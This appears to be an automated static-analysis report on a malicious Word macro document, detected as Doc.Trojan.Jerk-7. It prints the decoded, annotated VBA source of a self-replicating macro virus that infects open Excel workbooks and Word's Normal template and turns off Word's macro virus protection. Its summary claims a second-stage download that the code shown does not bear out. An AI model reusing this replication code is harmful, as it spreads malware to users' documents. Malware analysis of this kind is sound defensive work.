Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 230784e1913f7a84…

MALICIOUS

Office (OLE)

42.0 KB Created: 1999-02-20 21:16:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f6fdd11576008f36c9e5ae0fdf89fdb8 SHA-1: 2864bc0cdd2773ef8ddd4c661fcb931d2752f319 SHA-256: 230784e1913f7a842e4912287d2bfe4387d17d08c4bc9836e26e3a9e08bfdc64
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document with a high-severity heuristic indicating the presence of VBA macros. The extracted VBA code attempts to inject itself into other workbooks using the GetObject function, a known technique for obfuscation and payload delivery. The macro's intent appears to be downloading and executing a second-stage payload, although the specific URL or payload is not directly visible in the provided script excerpt. The ClamAV detection further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jerk-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28832 bytes
SHA-256: a0f5621b44aef2519f4f2cf53382dc4c1602e19f53a6a295fb9faa2d561c8218
Preview script
First 1,000 lines of the extracted script
' Module header as exported by olevba: the VBA attributes of the sample's
' "ThisDocument" component. VB_Base = "1Normal.ThisDocument" together with
' VB_TemplateDerived = True indicates the module is derived from a template,
' which is consistent with the Normal-template infection logic further down.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
































' Analysis note: Excel-side replication routine of this macro virus. When the
' workbook is deactivated it reads the complete source of this VBProject's first
' component, copies it into every empty code module of every open workbook, and
' re-saves workbooks that were clean and already saved so the copy persists on disk.
' The obfuscated Const names are plain literals: GMQATL = 1, ZCZLQJQHTMKY = True,
' DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0.
' VBA typing caveat: "Dim a, b As String" types only b; the first name is a Variant.
Private Sub Workbook_Deactivate()
' Every runtime error is swallowed, so a failure (e.g. no programmatic access to the
' VBA project object model) leaves no visible trace.
On Error Resume Next
Const GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0
Dim EEQRPDG, NMOSYIAVKTPWLM As String
Dim UXYIMEIWANP, GNXRKJLB As Integer
Dim OGZXTPHIPQQ As Boolean
NMOSYIAVKTPWLM = "ThisWorkbook"
' Harvest the entire source text (lines 1..CountOfLines) of component 1 of this workbook.
EEQRPDG = Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(GMQATL).CodeModule.CountOfLines)
' NLOYDEC is not in this excerpt; the other helpers here take the source ByRef, so it
' presumably transforms the text before replication — confirm against the full script.
Call NLOYDEC(EEQRPDG)
' Outer loop: every open workbook. Inner loop: every VBComponent of that workbook.
For UXYIMEIWANP = GMQATL To Application.Workbooks.Count
' Per-workbook "needs re-save" flag, reset to False.
OGZXTPHIPQQ = DAOGHJCAC
For GNXRKJLB = GMQATL To Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Count
' Only empty code modules (CountOfLines = 0) are written to, i.e. components that do not yet hold the payload.
If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.CountOfLines = OYUUUTFBKVJTCOC Then
' A workbook that exists on disk (Path <> ""), is currently saved, and is not yet flagged
' gets flagged so it is saved again after infection (see the Save below).
If Application.Workbooks.Item(UXYIMEIWANP).Path <> "" And Application.Workbooks.Item(UXYIMEIWANP).Saved = ZCZLQJQHTMKY And OGZXTPHIPQQ = DAOGHJCAC Then OGZXTPHIPQQ = ZCZLQJQHTMKY
' Copy the harvested source into the empty module starting at line 1.
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.InsertLines GMQATL, EEQRPDG
' Rewrite line 33 of the inserted code to the event name matching the target component:
' Workbook_Deactivate for "ThisWorkbook", Worksheet_Deactivate for anything else. In this
' listing the module body opens with 32 blank lines, which appears to place the Sub header
' exactly at line 33.
If Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).Name = NMOSYIAVKTPWLM Then
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(UXYIMEIWANP).VBProject.VBComponents.Item(GNXRKJLB).CodeModule.ReplaceLine GMQATL * 33, "Private Sub Worksheet_Deactivate()"
End If
End If
Next GNXRKJLB
' Persist the infected copy only where the workbook was clean and saved beforehand.
If OGZXTPHIPQQ = ZCZLQJQHTMKY Then Application.Workbooks.Item(UXYIMEIWANP).Save
Next UXYIMEIWANP
End Sub
' Analysis note: Word-side replication routine. On document close it copies macro
' source between the active document and the Normal template in whichever direction
' is needed: an infected document infects Normal, and an infected Normal infects a
' clean document. It also switches off Word's built-in macro virus protection option.
' Obfuscated Const names: ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0,
' GMQATL = 1, XZHDC = wdFormatDocument, FYADBWHMSYHYX = wdFormatTemplate, ZHFRIMGWHH = ":".
' VBA typing caveat: in the Dim lists below only the last name carries the declared type.
Private Sub Document_Close()
' All runtime errors are suppressed.
On Error Resume Next
Const ZCZLQJQHTMKY = True, DAOGHJCAC = False, OYUUUTFBKVJTCOC = 0, GMQATL = 1, XZHDC = wdFormatDocument, FYADBWHMSYHYX = wdFormatTemplate, ZHFRIMGWHH = ":"
Dim OGZXTPHIPQQ, VEJWDG, OOWJIBBZ, MJODT As Boolean
Dim OZBWWGT, VQAQBVFHUQ As Object
Dim FDJMUHIQSWTATK, EEQRPDG As String
' OZBWWGT = first VBComponent of the active document; VQAQBVFHUQ = first VBComponent of the Normal template.
Set OZBWWGT = ActiveDocument.VBProject.VBComponents.Item(GMQATL)
Set VQAQBVFHUQ = NormalTemplate.VBProject.VBComponents.Item(GMQATL)
' Seeds Rnd for the one-in-ten branch below.
Randomize
OOWJIBBZ = DAOGHJCAC
MJODT = DAOGHJCAC
' OOWJIBBZ: the document's module already contains code. MJODT: Normal's module already contains code.
If OZBWWGT.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then OOWJIBBZ = ZCZLQJQHTMKY
If VQAQBVFHUQ.CodeModule.CountOfLines <> OYUUUTFBKVJTCOC Then MJODT = ZCZLQJQHTMKY
' Sets Options.VirusProtection to False, i.e. disables Word's macro virus protection setting.
Options.VirusProtection = DAOGHJCAC
' Proceed only when exactly one of the two modules carries code (Xor) and the document is
' saved as a Word document or template.
If (OOWJIBBZ = ZCZLQJQHTMKY Xor MJODT = ZCZLQJQHTMKY) And (ActiveDocument.SaveFormat = XZHDC Or ActiveDocument.SaveFormat = FYADBWHMSYHYX) Then
' Direction 1: infected document -> clean Normal template.
If OOWJIBBZ = ZCZLQJQHTMKY Then
' Remember whether Normal was saved so it can be re-saved afterwards.
VEJWDG = NormalTemplate.Saved
EEQRPDG = OZBWWGT.CodeModule.Lines(GMQATL, OZBWWGT.CodeModule.CountOfLines)
' JJPGKBNVXZNSCME and FKDJUVTV are not in this excerpt; they take the source ByRef and
' presumably rewrite it — confirm against the full script.
Call JJPGKBNVXZNSCME(EEQRPDG)
' Int(Rnd * 10) = 7 is true roughly one time in ten; YPQVPZNASUFFVS (declared further down,
' truncated here) appears to be an identifier-renaming pass — verify in the full listing.
If Int(Rnd * 10 * GMQATL) = GMQATL * 7 Then Call YPQVPZNASUFFVS(EEQRPDG)
Call FKDJUVTV(EEQRPDG)
VQAQBVFHUQ.CodeModule.InsertLines GMQATL, EEQRPDG
If VEJWDG = ZCZLQJQHTMKY Then NormalTemplate.Save
End If
' Second character of the document's full name; it is ":" for a drive-letter path such as "C:\...".
FDJMUHIQSWTATK = Mid(ActiveDocument.FullName, 2, GMQATL)
' Direction 2: infected Normal -> clean document, when the document has a local drive path
' or has unsaved changes (Saved = False).
If MJODT = ZCZLQJQHTMKY And (FDJMUHIQSWTATK = ZHFRIMGWHH Or ActiveDocument.Saved = DAOGHJCAC) Then
OGZXTPHIPQQ = ActiveDocument.Saved
EEQRPDG = VQAQBVFHUQ.CodeModule.Lines(GMQATL, VQAQBVFHUQ.CodeModule.CountOfLines)
Call FKDJUVTV(EEQRPDG)
OZBWWGT.CodeModule.InsertLines GMQATL, EEQRPDG
' Re-save only if the document was already saved, so the infected copy lands on disk.
If OGZXTPHIPQQ = ZCZLQJQHTMKY Then ActiveDocument.Save
End If
End If
End Sub
Private Sub YPQVPZNASUFFVS(ByRef EEQRPDG As String)
On Error Resume Next
Const QIFRBCAZYANQS = 48, PAJIPWJXOHR = 15, TANEYWDERUD = 5, JOVHDK = 65, QJCZV = 90, GMQATL = 1, ZCZLQJQHTMKY = True, DAOGHJCAC = False
Dim KNPDNRGGCNVE, MQLWPEJIQGYUATmp, QOIJHY, MQLWPEJIQGYUA(GMQATL To QIFRBCAZYANQS), MQLWPEJIQGYUA2(GMQATL To QIFRBCAZYANQS) As String
Dim UXYIMEIWANP, GNXRKJLB, UWZPCBHDLHWS As Integer
Dim HDUMVDDNOOD As Boolean
KNPDNRGGCNVE = "EEQRPDG QIFRBCAZYANQS 
... (truncated)